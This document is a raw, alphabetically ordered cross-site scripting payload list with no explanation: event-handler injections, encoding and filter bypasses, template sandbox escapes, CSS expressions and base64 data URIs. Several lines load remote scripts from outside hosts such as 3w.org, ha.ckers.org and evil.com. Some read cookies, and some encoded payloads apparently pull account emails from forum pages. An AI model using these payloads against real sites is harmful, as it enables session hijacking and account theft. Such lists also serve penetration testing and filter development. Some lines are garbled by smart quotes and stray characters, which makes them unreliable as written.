- <body onPageShow body onPageShow=”javascript:javascript:alert(1)”></body onPageShow>
- <body/onpageshow=confirm()>//
- <body onpageshow=top[‘ale’+’rt’]()>
- <body onPopState body onPopState=”javascript:javascript:alert(1)”></body onPopState>
- <body onPropertyChange body onPropertyChange=”javascript:javascript:alert(1)”></body onPropertyChange>
- <body onresize=alert(1)>
- <body onresize=alert(1)>press F12!
- <body onresize=alert(97)>press F12!
- <body onResize body onResize=”javascript:javascript:alert(1)”></body onResize>
- <body onscroll=alert(1)>
- <body onscroll=alert(1)><br><br><br><br>
- <body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
- <body onscroll=alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x
- <body onscroll=alert(26)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
- <body onscroll=alert(96)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><x id=x>#x
- <body onscroll=alert(XSS)><br><br><br><br><br><br>…<br><br><br><br><input autofocus>
- <body onscroll=javascript:alert(1)><br><br><br><br><br><br>…<br><br><br><br><br><br><br><br><br><br>…<br><br><br><br><br><br><br><br><br><br>…<br><br><br><br><br><br><br><br><br><br>…<br><br><br><br><br><br><br><br><br><br>…<br><br><br><br><input autofocus>
- <body onscroll=javascript:alert(1)><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><br><input autofocus>
- <body onunload body onunload=”javascript:javascript:alert(1)”></body onunload>
- <body onUnload body onUnload=”javascript:javascript:alert(1)”></body onUnload>
- <body onunload=”javascript:alert(‘XSS’);”>
- <body rel=’popup=1;’onerror=popup=1; onload=x >
- <body><script>hash=location.hash.slice(1);document.body.innerHTML=decodeURIComponent(hash);</script></body>
- <body><script>hash=location.hash.slice(1);document.write(decodeURIComponent(hash));</script></body>
- <body scroll=confirm(1)><br><br><br><br><br><br>…<br><br><br><br><input autofocus>
- <body/s/onload=x={doc:parent.document};x.doc.writeln(1)
- <body src=1 href=1 onerror=”javascript:alert(1)”></body>
- <body style=”height:1000px” onwheel=”alert(1)”>
- <body style=”height:1000px” onwheel=”[DATA]”>
- <body style=”height:1000px” onwheel=”[JS-F**k Payload]”> <div contextmenu=”xss”>Right-Click Here<menu id=”xss” onshow=”[JS-F**k Payload]”>
- <body style=”height:1000px” onwheel=”prom%25%32%33%25%32%36x70;t(1)”> <div contextmenu=”xss”>Right-Click Here<menu id=”xss” onshow=”prom%25%32%33%25%32%36x70;t(1)”>
- <body style=overflow:auto;height:1000px onscroll=alert(1) id=x>#x
- <body style=overflow:auto;height:1000px onscroll=alert(95) id=x>#x
- <body><svg><x><script>alert(1)</script></x></svg></body>
- <BODY(‘XSS’)>
- body{xss:expression(alert(��Xss��))}
- body{xss:expression(alert(Xss))}
- body{xss:expression(alert(Xss-By-Muhaddi))}
- body{xxx:expression(eval(String.fromCharCode(105,102,40,33,119,105,110,100,111,119,46,120,41,123,97,108,101,114,116,40,39,120,115,115,39,41,59,119,105,110,100,111,119,46,120,61,49,59,125)))}
- <b onbeforescriptexecute=alert(185)>
- <bonbeforescriptexecute=prompt()>
- <b onclick=alert(1)>click me!
- “><b/onclick=”javascript:window.window.window[‘confirm’](1)”>bold
- bookContent.swf?currentHTMLURL=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4
- <br><br><br><br><br><br><br><br><br><br>
- <br><br><br><br><br><br><x id=x>#x
- <;br size=\”;&;{alert('XSS')}\”;>;
- <br size=”&{alert(‘XkSS’)}”>
- <br size=”&{alert(‘XSS’)}”>
- <br size=”&{alert(‘XSS’)}”>
- <br size=\”&{alert(‘XSS’)}\”>
- <;BR SIZE=”;&;{alert(‘;XSS’;)}”;>;
- <BR SIZE=”&{alert(‘XSS’)}”>
- <BR SIZE=”&{alert(XSS)}”> (Netscape)
- <BR SIZE=”&{confirm(‘XSS’)}”>
- <br SIZE=”&{document.vulnerable=true}”>
- <BR SIZE=”&{javascript:alert(1)}”>
- <;/br style=a:expression(alert())>;
- </br style=a:expression(alert())>
- </br style=a:expression(alert())>
- </br style=a:expression(alert(1))>
- <brute contenteditable onblur=alert(1)>lose focus!
- <brute contenteditable onfocus=alert(1)>focus this!
- <brute contenteditable oninput=alert(1)>input here!
- <brute contenteditable onkeydown=alert(1)>press any key!
- <brute contenteditable onkeypress=alert(1)>press any key!
- <brute contenteditable onkeyup=alert(1)>press any key!
- <brute contenteditable onpaste=alert(1)>paste here!
- //brutelogic.com.br/tests/status.html&msg=<script>alert(document.domain)
- //brutelogic.com.br/webgun/test.php?p=<body/onhashchange=alert(document.domain)>
- //brutelogic.com.br/webgun/test.php?p=<body/onresize=alert(document.domain)>
- //brutelogic.com.br/webgun/test.php?p=<svg/onload=eval(name)>&name=alert(document.domain)
- <brute onclick=alert(1)>clickme!
- <brute onclick=alert(1)>click this!
- <brute oncontextmenu=alert(1)>right click this!
- <brute oncopy=alert(1)>copy this!
- <brute oncut=alert(1)>copy this!
- <brute ondblclick=alert(1)>double click this!
- <brute ondrag=alert(1)>drag this!
- <brute onmousedown=alert(1)>click this!
- <brute onmousemove=alert(1)>hover this!
- <brute onmouseout=alert(1)>hover this!
- <brute onmouseover=alert(1)>hover this!
- <brute onmouseup=alert(1)>click this!
- <brute style=font-size:500px onmouseover=alert(1)>0000
- <brute style=font-size:500px onmouseover=alert(1)>0001
- <brute style=font-size:500px onmouseover=alert(1)>0002
- <brute style=font-size:500px onmouseover=alert(1)>0003
- <b <script>alert(1)</script>0
- <b <script>alert(1)//</script>0</script></b>
- <b “<script>alert(1)</script>”>hola</b>
- <b><script<b></b><alert(1)</script </b></b>
- <B=”<SCRIPT>confirm(1)</SCRIPT>”>
- <B <SCRIPT>confirm(1)</SCRIPT>>
- b={{set(‘_rootDataHost’,ownerdefaultView)}}
- [?=btoa][?`~)e`][?`OE’2UirU+`.split`1`[-~0]]`$${?`zoD`+”($)”}$``0${btoa(‘|o&|Y’).match(/[h-te]*/)+’(/’+btoa(‘n\x8a-3,’)+’/)’}`
- b=top,a=/loc/ . source,a+=/ation/ . source,b[a=a] = name
- b=\”URL(\\”\”;
- <button autofocus onfocus=confirm(2)>
- <button autofocus=x onchange=’import’onfocus=popup=1; >
- <button data=popup=1; id=’x’onfocus=popup=1; >
- <button form=test onformchange=alert(1)>//INJECTX
- <button form=x>xss<form id=x action=”javas	cript:alert(1)”//
- <button>’><img src=x onerror=confirm(0);></button>
- “<button>’><img src=x onerror=confirm(0);></button>”
- <button ‘ onclick=alert(1)//>*/alert(1)//
- <button/onclick=alert(20)>M
- <button onclick=popup=1;>
- <button onclick=”window.open(‘http://xss.cx/::Error138 ‘);”>CLICKME
- <button onfocus=alert(1) autofocus>
- <button onmousemove=”javascript:alert(1)”>renwa
- <button><select%20name=xss><option>%26%23x000000003c;script%26%23x000000003e;alert(1)%26%23x000000003c;/script%26%23x000000003e;
- <button><select%20name=xss><option>%26%23x3c;script%26%23x3e;
- buttons.html(button.getAttribute(“data-text”));
- “><button><svg/onload=v=prompt;v(/XSS/.source);v(0)></button>
- $(“button”).val(“<iframe src=vbscript:confirm(1)>”)
- `<b\x20#x (click)=”x.inn\x65rHTML=’\x3ciframe onload=alert(1)\x3e’”>CLICK</b>`
- B+Z+J+W+O;
- c={{}}
- %c0��//(0000%0dconfirm(1)//
- “ = %C0%A2 = %E0%80%A2 = %F0%80%80%A2
- ‘ = %C0%A7 = %E0%80%A7 = %F0%80%80%A7
- < = %C0%BC = %E0%80%BC = %F0%80%80%BC
- %C0%BCscript%C0%BEalert(1)%C0%BC/script%C0%BE
- > = %C0%BE = %E0%80%BE = %F0%80%80%BE
- %c0u003cimg+src%3d1+onerror%3dalert(/xss/)+%c0u003e
- %c1;alert(/xss/);//
- c2=c.getContext(‘2d’);
- c2=c.getContext(2d);
- ? (%c4%b0).toLowerCase() => i
- ? (%c4%b1).toUpperCase() => I
- ? (%c5%bf) .toUpperCase() => S
- ‘ = %CA%B9
- “ = %CA%BA
- %CA%BA>%EF%BC%9Csvg/onload%EF%BC%9Dalert%EF%BC%881)>
- %CA%BA%EF%BC%9E%EF%BC%9Csvg%20onload=alert(1)%EF%BC%9E
- %CA%BA%EF%BC%9E%EF%BC%9Csvg onload %EF%BC%9Dalert%EF%BC%881%EF%BC%89%EF%BC%9E
- ?callback=javascript:alert(1)”,
- callback({“name”:”[0xc0]\u003cimg src=1 onerror=alert(/xss/) [0xc0]\u003e”});
- callback({“name”:”u003cimg src=1 onerror=alert(/xss/) u003e”})
- ?callback=<script/src=?callback=alert(document.domain)//></script>
- <canvas onclick=”popup=1;”>
- Carriage Return Injected##<script%0Daaa>alert(1)</script%0Daaaa>
- \”))}catch(e){alert(1)}//
- \”));}catch(e){confirm(document.domain);}//
- \”));}catch(e){confirm(document.domain)}//
- ;\”))}catch(e) {confirm(document.location);}//
- ;\\”))}catch(e) {confirm(document.location);}//
- \”));}catch(e){x=window.open(‘http://xss.cx/');setTimeout('confirm(x.document.body.innerText)',4000)}//
- //@cc_on-alert(1))
- /*@cc_on-alert(1))
- <![CDATA”:
- <![CDATA[<h1>My HTML content</h1>]]>
- ![CDATA[<! — ]]<script>alert(‘XSS’);// →</script>
- <![CDATA[<]]>SCRIPT<![CDATA[>]]>alert(‘XSS’);<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
- <![CDATA[<script>confirm(document.domain)</script>]]>
- <![CDATA[<script>var n=0;while(true){n;}</script>]]>
- <![CDATA[<script>var n=0;while(true){n++;}</script>]]>
- c=d.createElement(‘canvas’);
- c=d.createElement(canvas);
- <center><h1 id=’text’>Click here to XSS!</h1></center>
- charset=utf-
- charset=utf- 32&v=%E2%88%80%E3%B8%80%E3%B0%80script%E3%B8%80alert(1)%E3%B0%80/script%E3%B8%80
- charset=utf-8&v=><img src=x onerror=prompt(0);>
- charset=utf-8&v=��><img src=x onerror=prompt(0);>
- c.height=480;
- Chrome (Any character \x01 to \x20)
- chrome&jsonp=alert(1);
- Chrome: this[Object[“keys”](this)[146]](1)
- ‘`”><*chr*script>log(*num*)</script>
- <cite><a href=”javascript:confirm(1);”>XSS cited!</a></cite>
- c=\”javascript:\”;
- ```${``[class extends[alert``]{}]}```
- [class extends[alert````]{}]
- ,class extends[]/alert(1){}
- !class extends`${alert(1)}```{}
- class extends[]/alert(1){}
- class XSS {public static function main() {flash.Lib.getURL(new flash.net.URLRequest(flash.Lib._root.url||”javascript:alert(1)”),flash.Lib._root.name||”_top”);}}
- [Click here](javascript:alert(1))
- ?clickTAG=javascript:alert(1)”,
- ?clickTAG=javascript:alert(1)&TargetAS=”,
- <code onmouseover=a=eval;b=alert;a(b(/g/.source));>HI</code>
- Code Reuse Regular Script
- : = :
- [color=red’ onmouseover=”alert(‘xss’)”]mouse over[/color]
- [color=red’ onmouseover=”alert(‘xss’)”]mouse over[/color]
- [color=red width=expression(alert(123))][color]
- [color=red width=expression(alert(123))][color]
- <command onmouseover=”javascript:confirm(0);”>Save //
- <command onmouseover=”\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x6 9\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B”>Save</command>
- <command onmouseover=”\x6A\x61\x76\x61\x53\x43\x52\x49\x50\x54\x26\x63\x6F\x6C\x6F\x6E\x3B\x63\x6F\x6E\x66\x6 9\x72\x6D\x26\x6C\x70\x61\x72\x3B\x31\x26\x72\x70\x61\x72\x3B”>Save</command>
- <Command onmouseover=”\ X6A \ x61 \ x76 \ x61 \ x53 \ x43 \ x52 \ x49 \ x50 \ x54 \ x26 \ x63 \ x6F \ x6C \ x6F \ x6E \ x3B \ x63 \ x6F \ x6E \ x6 6 \ x69 \ x72 \ x6D \ x26 \ x6C \ x70 \ x61 \ x72 \ x3B \ x31 \ x26 \ x72 \ x70 \ x61 \ x72 \ x3B “> Save </ command>
- <comment><img src=”</comment><img src=x onerror=alert(1)//”>
- <comment><img src=”</comment><img src=x onerror=alert(1))//”>
- <comment><img src=”</comment><img src=x onerror=alert(/ourren_demo/)//”>
- <comment><img src=”</comment><img src=x onerror=javascript:alert(1))//”>
- Components.lookupMethod(self, ‘alert’)(1)
- Components.lookupMethod(self, ‘confirm’)(1)
- =confirm(1);>”;>
- -confirm(1)-
- ‘-/”/-confirm(1)//’
- ‘-confirm`1`-’
- “-confirm`1`-”
- \’);confirm(1);//
- \”;confirm(1);//
- +confirm(1) —
- +confirm(1)
- ��;confirm(1)//
- confirm(1)”.replace(/.+/,eval)//
- confirm`1`; var something = `abc${confirm(1)}def`; ``.constructor.constructor`confirm\`1\````;
- confirm(1)>>>/xss
- ‘+confirm(9)&&null==’
- confirm = co\u006efir\u006d
- Confirm = co\u006efir\u006d
- -(confirm)(document.domain)//
- \”;confirm(document.location);//
- confirm(document.location)
- confirm(document.selection.createRange().getBookmark())
- confirm(location.hostname)
- ‘;confirm(String.fromCharCode(88,83,83))//’;confirm(String.fromCharCode(88,83,83))//”;
- confirm(String.fromCharCode(88,83,83))//”;confirm(String.fromCharCode(88,83,83))// —
- ‘;confirm(String.fromCharCode(88,83,83))//’;confirm(String.fromCharCode(88,83,83))//”;confirm(String.fromCharCode(88,83,83))//”;confirm(String.fromCharCode(88,83,83))// — </SCRIPT>”>’><SCRIPT>confirm(String.fromCharCode(88,83,83))</SCRIPT>
- ‘;confirm(String.fromCharCode(88,83,83))//\’;confirm(String.fromCharCode(88,83,83))//”;confirm(String.fromCharCode(88,83,83))//\”;confirm(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>confirm(String.fromCharCode(88,83,83))</SCRIPT>=&{}
- confirm(window.toStaticHTML(‘<base href=”http://xss.cx/"></base>'));
- confirm(window.toStaticHTML(‘<label style=”overflow:hidden;background:red;display:block;width:4000px;height:4000px;position:absolute;top:0px;left:0px;” for=”submit”>Click’));
- confirm(window.toStaticHTML(‘<marquee>foo</marquee>’));
- “; ||confirm(‘XSS’) || “
- confirm(<xss>xs{[function::status]}s</xss>)
- [][?=’constructor’][?](‘alert(1)’)()
- [].constructor.constructor(‘alert(1)’)()
- [].constructor.constructor(“alert” + “(1)”)()
- [][‘constructor’][‘constructor’](‘alert(1)’)()
- {{constructor.constructor(‘alert(1)’)()}}
- ${‘’.constructor.constructor(‘alert(1)’)()}
- {{constructor.constructor(‘alert(1)’)()}} <div ng-app> {‘a’.constructor.fromCharCode=[].join; ‘a’.constructor[0]=’\u003ciframe onload=alert(/Backdoored/)\u003e’;}} </div> <div ng-app> {{‘a’.constructor.prototype.charAt=[].join; $eval(‘x=alert(1)’)+’’}} </div> <script> onload=function(){document.write(String.fromCharCode(97));}</script> <SCRIPT SRC=http://3w.org/XSS/xss.js> </ SCRIPT> <SCRIPT SRC=http://3w.org/XSS/xss.js> </ SCRIPT> <IMG SRC=javascript:alert(‘XSS’)> <IMG SRC=JaVaScRiPt:alert(‘XSS’)> <IMG SRC=javascript:alert(“XSS”)> <IMG “””> <SCRIPT> Alert (“XSS”) </ SCRIPT> “> <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))> <IMG SRC=jav..??..S’)> Unicode encoding ( 9 ) 7 of UTF-8 is no semicolon ( calculator ) <IMG SRC=jav..??..S’)> <IMG SRC=java..??..XSS’)> <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC = “jav ascript: alert (‘XSS ‘ ) ; “ > <IMG SRC=”jav ascript:alert(‘XSS’);”> <IMG SRC=”javascript:alert(‘XSS’)”> <script> z = ‘document.’ </ script> <script> z = z + ‘write (“‘ </ script> <script> z = z + ‘<script’ </ script> <script> z = z + ‘src = ht’ </ script> <script> z = z + ‘tp :/ / ww’ </ script> <script> z = z + ‘w.zoyzo’ </ script> <script> z = z + ‘. cn / 1.’ </ script> <script> z = z + ‘js> </ sc’ </ script> <script> z = z + ‘ript> “)’ </ script> <script> eval_r (z) </ script> perl-e ‘print “<IMG SRC=javascript:alert(“XSS”)>”;’> out perl-e ‘print “<SCRIPT> alert (“ XSS “) </ SCRIPT>”;’> out <IMG SRC=” javascript:alert(‘XSS’);”> <SCRIPT/XSS SRC=”http://3w.org/XSS/xss.js"> </ SCRIPT> <BODY Onload!#$%&()*~+-_.,:;?@[/|]^`=alert(“XSS”)> <SCRIPT/SRC=”http://3w.org/XSS/xss.js"> </ SCRIPT> << SCRIPT> alert (“XSS”) ;/ / << / SCRIPT> <SCRIPT SRC = http://3w.org/XSS/xss.js? 
<B> <SCRIPT SRC=//3w.org/XSS/xss.js> <IMG SRC = “javascript: alert (‘XSS’)” <iframe src=http://3w.org/XSS.html> <SCRIPT> A = / XSS / alert (a.source) </ SCRIPT> “; alert (‘XSS’) ;/ / </ TITLE> <SCRIPT> alert (“XSS”); </ SCRIPT> <INPUT SRC=”javascript:alert(‘XSS’);”> <BODY BACKGROUND=”javascript:alert(‘XSS’)”><BODY(‘XSS’)> <IMG DYNSRC=”javascript:alert(‘XSS’)”> <IMG LOWSRC=”javascript:alert(‘XSS’)”> <BGSOUND SRC=”javascript:alert(‘XSS’);”> <LINK REL=”stylesheet” HREF=”javascript:alert(‘XSS’);”> <LINK REL=”stylesheet” HREF=”http://3w.org/xss.css"> <STYLE> Li {list-style-image: url (“javascript: alert (‘XSS’)”);} </ STYLE> <UL> <LI> XSS <IMG SRC=’vbscript:msgbox(“XSS”)’> </ STYLE> <UL> <LI> XSS %3Cscript%3Ealert(%22XSS%22)%3C/script%3E <script>alert(“XSS”)</script> <script>alert(“XSS”)</script> <script>alert(%34XSS%34)</script> <script>alert(‘XSS’)</script> callback=javascript://anything%0D%0A%0D%0Awindow.alert(1)// javascript:alert(document.cookie);// ‘;alert(String.fromCharCode(88,83,83))//’;alert(String.fromCharCode(88,83,83))//”; alert(String.fromCharCode(88,83,83))//”;alert(String.fromCharCode(88,83,83))// →</SCRIPT>”>’><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> <IMG SRC=”javascript:alert(‘XSS’);”> <a onmouseover=”alert(document.cookie)”>xxs link</a> <a onmouseover=alert(document.cookie)>xxs link</a>
- constructor.constructor(“aler”+”t(3)”)();
- [][?=’constructor’][?](‘ert(‘.padStart(6,’al’).padEnd(8,’1)’))()
- ;[].constructor.prototype.join=function(){return’pwnd’};eval(‘alert(1)’)
- [][?=/constructor/.source][?](/alert(1)/.source)()
- [][?=/constructor/.source][?](/alert(1)/.source)()for(n in{constructor:0})[][?=n][?](/alert(1)/.source)())
- <% contenteditable onresize=alert(1)>
- continueURI=/login2.jsp?friend=<img src=xonerror=alert(1)>;
- <ControllerColor>C0C0C0</ControllerColor>
- # credit to rsnake
- →cript:alert(‘XSS’)”></B></I></XML> <SPAN DATASRC=”#xss” DATAFLD=”B”
- <cta id=ANSES actionType=download data=javascript://adobe.com%0aalert(document.domain)><![CDATA[ CLICK HERE ]]></cta>
- {{c=toString.constructor;p=c.prototype;p.toString=p.call;[“a”,”alert(1)”].sort(c)}}
- ctx.call(“fun”)
- ctx.eval(‘1+1’)
- ctx.eval(“var fun = () => ({ foo: 1 });”)
- ctx = py_mini_racer.MiniRacer()
- c.width=500;x.font=’9em”’for(i=3;i — ;x.fillText(T[0]+T[1]+T[2],40,200))t%6<i+2?T[i]=[…’’][(i*t+9*t|0)%5]:S
- c.width=640;
- </C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>
- d=0||’une’+’scape’||0;a=0||’ev’+’al’||0;b=0||’locatio’;b+=0||’n’||0;c=b[a];d=c(d);c(d(c(b)))
- #d2l0aChkb2N1bWVudClib2R5LmFwcGVuZENoaWxkKGNyZW
- d=\”alert(‘XSS’);\\”)\”;
- .data
- data:%2f%2f;ba se64;;//,P HNjcmlw dD5hbG VydC gxKTwvc2NyaXB0Pg= =
- DATAFORMATAS=”HTML”></SPAN>
- <*datahtmlelements* data=about:blank background=about:blank action=about:blank type=image/gif src=about:blank href=about:blank *dataevents*=”customLog(‘*datahtmlelements* *dataevents*’)”></*datahtmlelements*>
- <*datahtmlelements* *dataevents*=”javascript:parent.customLog(‘*datahtmlelements* *dataevents*’)”></*datahtmlelements*>
- <*datahtmlelements* *datahtmlattributes*=”javascript:parent.customLog(‘*datahtmlelements* *datahtmlattributes*’)”></*datahtmlelements*>
- data:[<MIME-type>][;charset=<encoding>][;base64],<data>
- data:),<script>alert(1)</script>
- data:text/html;alert(1)/*,<svg%20onload=eval(unescape(location))>
- data:text/html;alert(1)/*,<svg%20onload=eval(unescape(location))><title>*/;alert(2);function%20text(){};function%20html(){}
- data:text/html;base64,PHN2Zy9vbmxvYWQ9YWxlcnQoMik+
- data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=
- data:text/html;base64,PHNjcmlwdD5hbGVydCgiY29va2llOiAiK2RvY3VtZW50LmNvb2tpZSk8L3NjcmlwdD4=#?someRandomParam1=blah&someRandomParam2=blah
- data:text/html;base64,PHNjcmlwdD5hbGVydCgwKTwvc2NyaXB0Pg==
- data:text/html;base64,PHNjcmlwdD5hbGVydCgxKTwvc2NyaXB0Pg==
- data:text/html;base64,PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pPC9zY3JpcHQ+
- data:text/html;base64,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
- data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe2FsZXJ0KGRvY3VtZW50LmZyYW1lc1swXS5kb2N1bWVudC5jb29raWUpfWZ1bmN0aW9uIGIoKXt2YXIgaT1kb2N1bWVudC5jcmVhdGVFbGVtZW50KCdpZnJhbWUnKTtpLnN0eWxlPSd3aWR0aDowcHg7aGVpZ2h0OjBweDt2aXNpYmlsaXR5OmhpZGRlbic7aS5zcmMgPSAnaHR0cHM6Ly9yZG90Lm9yZy9mb3J1bS9jbGllbnRzY3JpcHQvdmJ1bGxldGluX3JlYWRfbWFya2VyLmpzJztpLm9ubG9hZD1mdW5jdGlvbigpe2EoKX07ZG9jdW1lbnQuYm9keS5hcHBlbmRDaGlsZChpKX08L3NjcmlwdD48Ym9keSBvbmxvYWQ9YigpPg==
- data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe3ZhciB4PW5ldyBYTUxIdHRwUmVxdWVzdDt4Lm9wZW4oJ0dFVCcsJ2h0dHAnKyhkb2N1bWVudC5yZWZlcnJlci5sZW5ndGggPyAnJyA6ICdzJykrJzovL2ZvcnVtLmFudGljaGF0LnJ1L3Byb2ZpbGUucGhwP2RvPWVkaXRwYXNzd29yZCcsZmFsc2UpO3guc2VuZChudWxsKTthbGVydCh4LnJlc3BvbnNlVGV4dC5tYXRjaCgvbmFtZT0iZW1haWwiIHZhbHVlPSIoLis/KSIvKVsxXSl9PC9zY3JpcHQ+PGJvZHkgb25sb2FkPWEoKT4=
- data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZnVuY3Rpb24gYSgpe3ZhciB4PW5ldyBYTUxIdHRwUmVxdWVzdDt4Lm9wZW4oJ0dFVCcsJ2h0dHBzOi8vcmRvdC5vcmcvZm9ydW0vcHJvZmlsZS5waHA/ZG89ZWRpdHBhc3N3b3JkJyxmYWxzZSk7eC5zZW5kKG51bGwpO2FsZXJ0KHgucmVzcG9uc2VUZXh0Lm1hdGNoKC9uYW1lPSJlbWFpbCIgdmFsdWU9IiguKz8pIi8pWzFdKX08L3NjcmlwdD48Ym9keSBvbmxvYWQ9YSgpPg==
- data:text/html;base64,PHNjcmlwdD5pZihkb2N1bWVudC5kb21haW49PSd0aW55dXJsLmNvbScpbG9jYXRpb24ucmVsb2FkKCk7ZWxzZXthbGVydChkb2N1bWVudC5kb21haW4pfTwvc2NyaXB0Pg==
- data:text/html;charset=utf-7;base64,Ij48L3RpdGxlPjxzY3JpcHQ+YWxlcnQoMTMzNyk8L3NjcmlwdD4=
- data:text/html;charset=utf-8,<h1>abc
- data:text/html,<iframe src=javascript:alert(1)>
- data:text/html,<img src=1 onerror=alert(1)>
- #data:text/html,<img src=1 onerror=alert(document.domain)
- data:text/html,/*<img src=x ‘-alert(1)-’ onerror=alert(1)>*/alert(1)
- data:text/html,/*<img src=x ‘-confirm(1)-’ onerror=confirm(1)>*/confirm(1)
- data:text/html,<script>alert(0)</script>
- data:text/html,< sc r i p t >alert(1)</sc r ip t>
- data:text/html,<script>alert(1)</script>//
- data:text/html,<script>alert(1)</script>
- data:text/html,<script>confirm(0);confirm(1);location.reload();</script>
- data:text/html,<svg onload=alert(1)>
- data:text/html,<svg onload=alert(/@irsdl/)></svg>
- data://text/javascript,alert(‘xss’)
- Data URL
- d.body.appendChild(z)
- d.body.appendChild(z)},0)>
- d=document;
- _.defer(alert, 9)
- .__defineGetter__.constructor(‘[].constructor.
- defineSetter(‘x’,confirm); x=1;
- _.delay(alert, 0, 9)
- delete~[a=confirm]/delete a(1)
- delete [a=confirm],delete a(1)
- delete confirm(1)
- delete [][‘__proto__’][‘toString’];[][‘__proto__’][Symbol.toStringTag]=’=alert(1)’;eval([1,2,3]+’’);
- delFeedback(‘')alert(1)’
- <details onfocus = “alert(1)”>
- <details ontoggle=alert(1)>
- <details ontoggle=”aler\u0074(1)”>
- “><details/ontoggle=co\u006efir\u006d`1`>clickmeonchrome
- <details open ontoggle=”alert(1)”>
- <details open ontoggle=alert(1)>
- <details/open/ontoggle=”alert`1`”>
- ><detials ontoggle=confirm(0)>
- ��><detials ontoggle=confirm(0)>
- <dialog open=”” onclose=”alert(1)”><form
- <dialog open=”” onclose=”alert(1)”><form method=”dialog”><button>Close me!</button></form></dialog>
- display:block;color:transparent;
- <div>
- <div%20id=a%20style=float:left%20onfocus=alert(1)>#a
- <div%20id=”a”%20style=-ms-block-progression:bt%20onfocus=alert(1)>#a
- <div%20id=a%20style=-ms-layout-flow:vertical-ideographic%20onfocus=alert(1)>#a
- <div%20style=-webkit-user-modify:read-write%20onfocus=alert(1)%20id=x>#x
- <%div%20style=xss:expression(prompt(1))>
- <DIV><A></A>
- <div> <a href=/**/alert(15)>XSS</a><base href=”javascript:\ </div><div id=”x”></div>
- <div> <a href=/**/alert(1)>XSS</a><base href=”javascript:\ </div><div id=”x”></div>
- <div>`-alert(1)</script><script>`</div>
- <div>`-alert(4)</script><script>`</div>
- <div><base href=//cors.l0.cm/</div><script src=/test.js></script>
- <div><base href=//evil/</div>
- <div><base href=//evil/ </div>
- <div><base href=”javascript:/”><a href=/**/alert(1)>XSS</a></div>
- <div><base href=”javascript:\”><a href=/**/alert(1)>XSS</a></div>
- <div><base/href=javascript:/><a href=/*’”+-/%~.,()^&$#@!*/alert(1)>XSS</a></div>
- <div class=”qm_left” style=”position:relative;z-index:2;background:url(//xss.tw/2180) no-repeat 0 0;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src=’//xss.tw/2180',sizingMethod=’scale’);width:40px;height:40px;”>
- <div contenteditable onresize=”alert(1)”></div>
- <div contextmenu=x>right-click<menu id=x onshow=confirm(1)>
- <div contextmenu=”xss”>Right-Click Here<menu id=”xss” onshow=”alert(1)”>
- <div contextmenu=”xss”>Right-Click Here<menu id=”xss” onshow=”[DATA]”>
- div data-bind=”foo: “ /div
- div data-bind=”html:’hello bworld /b’” /div
- div data-bind=”html:’ script src=”//evil.com” /script’” /div
- div data-bind=”value:’hello world’”?/div
- div data-dojo-type=”dijit/Declaration”data-dojo-props=”} — {“
- <div datafld=”b” dataformatas=”html” dataid=XSS SRC=”#XSS”></div>
- <div datafld=”b” dataformatas=”html” datasrc=”#X”></div>
- div data-role=”button”data-text=”I am a button” /div
- div data-role=”button”data-text=” script /script” /div
- div data-role=popup id=’ — script /script’?/div
- div data-toggle=tooltip data-html=true title=’script /script’ /div
- div data-toggle=tooltip title=’I am atooltip!’some text /div
- </div><div id=”x”>AAA</div>
- <div draggable=”true” ondragstart=”event.dataTransfer.setData(‘text/plain’, ‘Evil data’)><h3>DRAG ME!!</h3></div>
- <div><embed allowscriptaccess=always src=/xss.swf><base href=//l0.cm/</div>
- <div><embed allowscriptaccess=always src=/xss.swf><base href=”//l0.cm/</div><div id=”x”>AAA</div>
- <div> <embed allowscriptaccess=always src=/xss.swf><base href=”//l0.cm/ </div><div id=”x”></div>
- <div id=”alert(/@0x6D6172696F/)” style=”x:expression(eval)(id)”>
- <div id=”confirm(2)” style=”x:expression(eval)(id)”>
- <div id=d><div style=”font-family:’sans\27\2F\2A\22\2A\2F\3B color\3Ared\3B’”>X</div></div>
- <div id=d><div style=”font-family:’sans\27\3B color\3Ared\3B’”>X</div></div>
- <div id=d><div style=”font-family:’sans\27\3B color\3Ared\3B’”>X</div></div> <script>with(document.getElementById(“d”))innerHTML=innerHTML</script>
